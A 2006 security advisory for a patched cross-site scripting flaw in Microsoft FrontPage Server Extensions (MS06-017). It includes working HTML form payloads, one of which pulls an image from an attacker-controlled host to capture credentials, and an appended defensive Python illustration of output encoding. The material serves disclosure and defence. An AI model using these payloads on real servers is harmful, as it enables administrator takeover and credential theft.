Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting
user name
2006-04-12 21:30:21
Argeniss Security Advisory


Name:  Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting (MS06-017)
Affected Software:  Microsoft FrontPage Server Extensions 2002 and Microsoft SharePoint Team Services
Severity:  Medium
Remote exploitable:  Yes (User intervention required)
Credits:  Esteban Martínez Fayó
Date:  4/11/2006
Advisory Number:  ARG040602


Details:
The FrontPage Server Extensions 2002 (included in Windows Server 2003 IIS 6.0 and available as a separate download for Windows 2000 and XP) has a web page /_vti_bin/_vti_adm/fpadmdll.dll that is used for administrative purposes. This web page is vulnerable to cross-site scripting attacks, allowing an attacker to run client-side script on behalf of an FPSE user. If the victim is an administrator, the attacker could take complete control of a FrontPage Server Extensions 2002 server.

To exploit the vulnerability an attacker can send a specially crafted e-mail message to an FPSE user and then persuade the user to click a link in the e-mail message. In addition, this vulnerability can be exploited if an attacker hosts a malicious website and persuades the user to visit it.

The vulnerable parameters of fpadmdll.dll are "operation", "command", and "name". These parameters appear in the output without proper sanitization inside an HTML comment, but the comment can be escaped with a '-->'.

Exploit Examples:

An attacker could create a FORM that POSTs to the FPSE server and executes script on the client system.

<form action="http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll" method="POST">
<input type="hidden" name="operation" value="--><script>alert()</script>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>

Also, an attacker could inject an image from another web site that he has control over, and if it uses HTTP authentication, could convince the user to enter their credentials and capture them.

<form action="http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll" method="POST">
<input type="hidden" name="operation" value="--><img src=http://hackersite/image.jpg>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>


Vendor Status:
Vendor was contacted and a patch was released.


Patch Available:
Apply patch MS06-017.


Links:
http://www.argeniss.com/research/ARGENISS-ADV-040602.txt

http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx


Spam:
Argeniss Ultimate 0day Exploits Pack
http://www.argeniss.com/products.html



Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com

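Added here as an illustration of the comment-breakout pattern described in the advisory's Details section (example code written for this page, not part of the advisory, of Argeniss, or of FrontPage): a constructed page template that echoes a request parameter inside an HTML comment, the same reflection without and with output encoding, and a parser check showing whether a browser would see injected markup. The template, function names and the "healthrp.htm" sample value are assumptions for the example.

```python
import html
from html.parser import HTMLParser

# Minimal model of the bug class: a request parameter is echoed inside an
# HTML comment in the response. The template is constructed for this example.
TEMPLATE = "<html><body><!-- operation={value} -->Health report</body></html>"


def render_vulnerable(value: str) -> str:
    """Reflects the parameter verbatim; a '-->' in the value ends the comment
    early and everything after it is parsed as live markup."""
    return TEMPLATE.format(value=value)


def render_hardened(value: str) -> str:
    """Entity-encodes < > & " and splits any '--' so the value can never form
    a comment terminator. Entities are not decoded inside comments, so '&gt;'
    remains literal text there and cannot close the comment."""
    safe = html.escape(value, quote=True).replace("--", "- -")
    return TEMPLATE.format(value=safe)


class _TagCollector(HTMLParser):
    """Records start tags the way a browser's tokenizer would see them;
    text inside a comment never reaches handle_starttag."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(page: str) -> list:
    """Returns tags parsed from the page other than the template's own
    <html> and <body>; a non-empty list means the comment was escaped."""
    parser = _TagCollector()
    parser.feed(page)
    parser.close()
    return [t for t in parser.tags if t not in ("html", "body")]


# The breakout string from the advisory's first exploit example.
PAYLOAD = '--><script>alert()</script>"'

if __name__ == "__main__":
    print("vulnerable:", injected_tags(render_vulnerable(PAYLOAD)))  # ['script']
    print("hardened:  ", injected_tags(render_hardened(PAYLOAD)))    # []
```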


--
NTBugtraq Editor's Note:

Most viruses these days use spoofed email addresses. As
such, using an Anti-Virus product which automatically
notifies the perceived sender of a message it believes is
infected may well cause more harm than good. Someone who did
not actually send you a virus may receive the notification
and scramble their support staff to find an infection which
never existed in the first place. Suggest such notifications
be disabled by whomever is responsible for your AV, or at
least that the idea is considered.
--